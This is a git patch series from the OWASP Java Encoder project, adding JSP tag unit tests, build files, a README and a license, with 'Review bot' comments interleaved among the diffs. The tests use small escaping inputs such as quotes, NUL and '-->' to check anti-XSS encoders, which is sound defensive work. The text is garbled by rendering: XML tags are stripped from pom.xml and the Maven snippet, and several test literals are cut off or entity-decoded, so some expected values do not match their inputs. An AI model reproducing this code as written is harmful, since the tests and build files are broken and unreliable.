    \"\'"; + String expected = "
    \\x22\\x27"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java new file mode 100644 index 0000000..79d7163 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java 
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForJavaScriptBlockTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptBlockTagTest extends EncodingTagTest {
+
+ public ForJavaScriptBlockTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForJavaScriptBlockTag.
+ * This is a very simple test that doesn't fully
+ * excersize/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForJavaScriptBlockTag instance = new ForJavaScriptBlockTag();
+ String value = "'\"\0";
+ String expected = "\\'\\\"\\x00";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java
new file mode 100644
index 0000000..400c8d9
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java
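Review bot: `testDoTag()` pins only how `'`, `"` and NUL are escaped in block mode, which is the visible difference from ForJavaScriptAttributeTagTest, but the hazard specific to a script block — data that contains `</script>` or `<!--` and so could end the block the caller opened — is not exercised at all. A second input such as `"</script>"` with the encoder's actual output as `expected` would pin that property for the tag; I cannot read the block encoder's handling of `/` from this hunk, so the expected literal must be taken from the encoder rather than written from memory. A one-line comment above `value` naming what the three characters are meant to prove, e.g. `// block mode: quotes become backslash escapes, NUL becomes \x00`, would also help.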
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForJavaScriptSourceTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptSourceTagTest extends EncodingTagTest {
+
+ public ForJavaScriptSourceTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForJavaScriptSourceTag.
+ * This is a very simple test that doesn't fully
+ * excersize/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForJavaScriptSourceTag instance = new ForJavaScriptSourceTag();
+ String value = "\0'\"";
+ String expected = "\\x00\\'\\\"";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java
new file mode 100644
index 0000000..c7427a7
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java
@@ -0,0 +1,46 @@
+/*
+ * To change this template, choose Tools | Templates
+ * and open the template in the editor.
+ */
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForJavaScriptTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptTagTest extends EncodingTagTest {
+
+ public ForJavaScriptTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForJavaScriptTag.
+ * This is a very simple test that doesn't fully
+ * excersize/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForJavaScriptTag instance = new ForJavaScriptTag();
+ String value = "\0'\"";
+ String expected = "\\x00\\x27\\x22";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java
new file mode 100644
index 0000000..6709cde
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java
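Review bot: ForJavaScriptTagTest starts with the IDE template placeholder `To change this template, choose Tools | Templates` in place of the BSD license header that every sibling test file in this commit carries, so this file is committed without a copyright notice. Replace that four-line comment with the same `// Copyright (c) 2012 Jeff Ichnowski` block used at the top of ForJavaScriptSourceTagTest. The expected literal `"\\x00\\x27\\x22"` hex-escapes both quote characters, whereas the ForJavaScriptSourceTagTest hunk asserts the `\\'` and `\\\"` forms for the same input; presumably that is the intended difference between the two tags, but a one-line comment on the `expected` literal stating which output form this tag guarantees would make the contrast deliberate rather than accidental.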
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForUriComponentTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForUriComponentTagTest extends EncodingTagTest {
+
+ public ForUriComponentTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForUriComponentTag.
+ * This is a very simple test that doesn't fully
+ * excersize/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForUriComponentTag instance = new ForUriComponentTag();
+ String value = "&=test";
+ String expected = "%26amp%3B%3Dtest";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java
new file mode 100644
index 0000000..d401d89
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java
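Review bot: As rendered here, `String value = "&=test";` and `String expected = "%26amp%3B%3Dtest";` do not agree: standard percent-encoding of `&=test` gives `%26%3Dtest`, and `%26amp%3B` can only come from an input that already contains the entity `&amp;`. The value literal most likely reads `"&amp;=test"` in the committed file and was entity-decoded when the page was rendered, but that is worth confirming, because if the source really contains `"&=test"` this assertion cannot pass. The ForXmlAttributeTagTest hunk shows the same symptom: its `value` literal is cut off and `expected` is the raw `<div>`, where an attribute encoder would be expected to yield `&lt;div&gt;`. A comment on each `expected` literal naming the rule being checked, e.g. `// '&' -> %26, '=' -> %3D`, would make such a mismatch obvious to the next reader.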
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForUriTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForUriTagTest extends EncodingTagTest {
+
+ public ForUriTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForUriTag.
+ * This is a very simple test that doesn't fully
+ * excersize/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForUriTag instance = new ForUriTag();
+ String value = "\\\"";
+ String expected = "%5C%22";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java
new file mode 100644
index 0000000..ec42f28
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForXmlAttributeTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlAttributeTagTest extends EncodingTagTest {
+
+ public ForXmlAttributeTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForXmlAttributeTag.
+ * This is a very simple test that doesn't fully
+ * excersize/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForXmlAttributeTag instance = new ForXmlAttributeTag();
+ String value = "
    ";
+ String expected = "<div>";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java
new file mode 100644
index 0000000..cf5182a
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForXmlCommentTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlCommentTagTest extends EncodingTagTest {
+
+ public ForXmlCommentTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForXmlCommentTag.
+ * This is a very simple test that doesn't fully
+ * excersize/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForXmlCommentTag instance = new ForXmlCommentTag();
+ String value = "--> + + + 4.0.0 + + org.owasp.encoder + encoder-parent + 1.2-SNAPSHOT + pom + + OWASP Encoders Parent + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting.
+ + + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + 2011 + + OWASP (Open Web-Application Security Project) + https://www.owasp.org/ + + + + + The BSD 3-Clause License + http://www.opensource.org/licenses/BSD-3-Clause + repo + + + + + org.sonatype.oss + oss-parent + 7 + + + + scm:svn:https://owasp-java-encoder.googlecode.com/svn/trunk/ + scm:svn:http://owasp-java-encoder.googlecode.com/svn/trunk/ + http://code.google.com/p/owasp-java-encoder/source/browse/ + + + + + Owasp-java-encoder-project + https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project + https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project + owasp-java-encoder-project@lists.owasp.org + http://lists.owasp.org/pipermail/owasp-java-encoder-project/ + + + + + Google Code + http://code.google.com/p/owasp-java-encoder/issues/list + + + + + Jeff Ichnowski + + Project Owner + Architect + Developer + + + + Jim Manico + + Architect + Developer + + + + + + Jeremy Long + jeremy.long@gmail.com + + + + + UTF-8 + + + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.0 + + 1.5 + 1.5 + + + + + + + core + jsp + esapi + + + -- cgit v1.2.3 From 0855f008384c82aa9d531dbed31f902754a6fc61 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:42:06 -0400 Subject: initial version --- .gitignore | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..dbd3596 --- /dev/null +++ b/.gitignore @@ -0,0 +1,14 @@ +*/target/** +# Intellij project files +*.iml +*.ipr +*.iws +.idea/ +# Eclipse project files +.classpath +.project +.settings +maven-eclipse.xml +.externalToolBuilders +# Netbeans configuration +nb-configuration.xml \ No newline at end of file -- cgit v1.2.3 From 09fb227288cb94957698cd45ec4e34888b08c47a Mon Sep 17 00:00:00 2001 
From: Jeremy Long Date: Mon, 30 Mar 2015 06:42:34 -0400 Subject: initial version --- README.md | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..ae791cc --- /dev/null +++ b/README.md 
@@ -0,0 +1,53 @@
+OWASP Java Encoder Project
+==========================
+Contextual Output Encoding is a computer programming technique necessary to stop Cross Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance encoder class with little baggage.
+
+For more information on how to use this project, please see https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project.
+
+Start using the OWASP Java Encoders
+-----------------------------------
+You can download a JAR from [Maven Central](http://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22).
+
+JSP tags and functions are available in the encoder-jsp, also avaiable in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.1.1/encoder-jsp-1.1.1.jar). This jar requires the core library.
+
+The jars are also available in Maven:
+
+'''xml
+
+ org.owasp.encoder
+ encoder
+ 1.1.1
+
+
+
+ org.owasp.encoder
+ encoder-jsp
+ 1.1.1
+
+```
+
+Quick Overview
+--------------
+The OWASP Java Encoder library is intended for quick contextual encoding with very little overhead, either in performance or usage. To get started, simply add the encoder-1.1.1.jar, import org.owasp.encoder.Encode and start using.
+
+Example usage:
+
+```java
+ PrintWriter out = ....;
+ out.println("");
+```
+
+Please look at the javadoc for Encode to see the variety of contexts for which you can encode.
+
+Happy Encoding!
+
+News
+----
+### 2014-03-31 - Documentation updated
+Please visit https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project to see detailed documentation and examples on each API use!
+
+### 2014-01-30 - Version 1.1.1 released
+We're happy to announce that version 1.1.1 has been released. Along with a important bug fix, we added ESAPI integration to replace the legacy ESAPI encoders with the OWASP Java Encoder.
+
+### 2013-02-14 - Version 1.1 released
+We're happy to announce that version 1.1 has been released. Along with a few minor encoding enhancements, we improved performance, and added a JSP tag and function library.
\ No newline at end of file
-- cgit v1.2.3 From 20ec48ce1bed54131dd000a71c0b6820e4f29f29 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:43:07 -0400 Subject: BSD 3.0 --- LICENSE | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 LICENSE
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..f66c375
--- /dev/null
+++ b/LICENSE
@@ -0,0 +1,33 @@
+Copyright (c) 2015 Jeff Ichnowski
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+ * Redistributions of source code must retain the above
+ copyright notice, this list of conditions and the following
+ disclaimer.
+
+ * Redistributions in binary form must reproduce the above
+ copyright notice, this list of conditions and the following
+ disclaimer in the documentation and/or other materials
+ provided with the distribution.
+
+ * Neither the name of the OWASP nor the names of its
+ contributors may be used to endorse or promote products
+ derived from this software without specific prior written
+ permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+OF THE POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
-- cgit v1.2.3 From 8964a1902f02a1ca9a42456150cc37634ae494c8 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:44:39 -0400 Subject: minor correction --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index ae791cc..af278c6 100644
--- a/README.md
+++ b/README.md
@@ -12,7 +12,7 @@ JSP tags and functions are available in the encoder-jsp, also avaiable in [Centr The jars are also available in Maven: -'''xml +```xml org.owasp.encoder encoder -- cgit v1.2.3 From 4d0667ebd1eda0ac6f9025a26bc5acdf2ce239b5 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 30 Mar 2015 06:54:25 -0400 Subject: corrected license --- core/pom.xml | 59 ++++++++++++++++++++++++++------------- esapi/pom.xml | 90 ++++++++++++++++++++++++++++++++++++----------------------- jsp/pom.xml | 58 +++++++++++++++++++++++++------------- pom.xml | 60 ++++++++++++++++++++++++++------------- 4 files changed, 173 insertions(+), 94 deletions(-) diff --git a/core/pom.xml b/core/pom.xml index 917768b..8ee4d3d 100644 --- a/core/pom.xml +++ b/core/pom.xml 
@@ -1,23 +1,43 @@ +~ Copyright (c) 2015 OWASP. +~ All rights reserved. +~ +~ Redistribution and use in source and binary forms, with or without +~ modification, are permitted provided that the following conditions +~ are met: +~ +~ * Redistributions of source code must retain the above +~ copyright notice, this list of conditions and the following +~ disclaimer. +~ +~ * Redistributions in binary form must reproduce the above +~ copyright notice, this list of conditions and the following +~ disclaimer in the documentation and/or other materials +~ provided with the distribution. +~ +~ * Neither the name of the OWASP nor the names of its +~ contributors may be used to endorse or promote products +~ derived from this software without specific prior written +~ permission. +~ +~ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +~ "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +~ LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +~ FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +~ COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +~ INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +~ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +~ SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +~ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +~ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +~ ARISING IN ANY WAY OUT OF THE USE OF THIS 